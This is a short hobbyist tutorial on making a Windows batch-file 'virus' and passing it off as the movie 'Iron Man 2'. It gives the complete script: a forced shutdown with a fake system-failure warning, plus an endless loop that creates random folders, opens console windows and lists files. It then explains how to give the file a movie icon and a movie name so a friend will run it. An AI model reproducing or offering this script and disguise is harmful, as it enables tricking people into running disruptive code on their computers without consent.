Introduction: Simple Virus for Windows 7+

About: I like computers. Done.

In this Indestructible, I will be showing you how to make a very simple virus (enough to give the average person a headache). It is a batch file that will look like the movie Iron Man 2. Have fun!

Step 1:

First go to Notepad and copy/ paste this in (or if your insane, you can type it all out):

------------------------------------------------------------------------------------------------------------------------------------------------------------------
@echo off
mode 200
color 1a
shutdown -s -c "WINDOWS HAS DETECTED A SYSTEM FAILURE. SHUTTING DOWN TO PROTECT DATA." -t 30
:a
md %random%
start
dir /s
goto a

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

Step 2:

Save the file as "Iron Man 2.bat" without the quotes.

Step 3:

Go to My Documents in the Start Menu and find Iron Man Two. The icon should be two blue gears with a white background. Right click on it and create a shortcut.

Step 4:

Right click the short cut and select Properties. Than, in the Shortcut Tab, click on Change Icon. Disregard the error message and click OK. when the list of available icons appears, select the one that looks like a movie (you may have to scroll a bit) and then click OK. Then go to the General Tab and rename the file to "Iron Man 2", or whatever movie name you want.


The icon might look like the one below.

Step 5:

Your done! Tell a friend to click on it (advisably not on your computer!)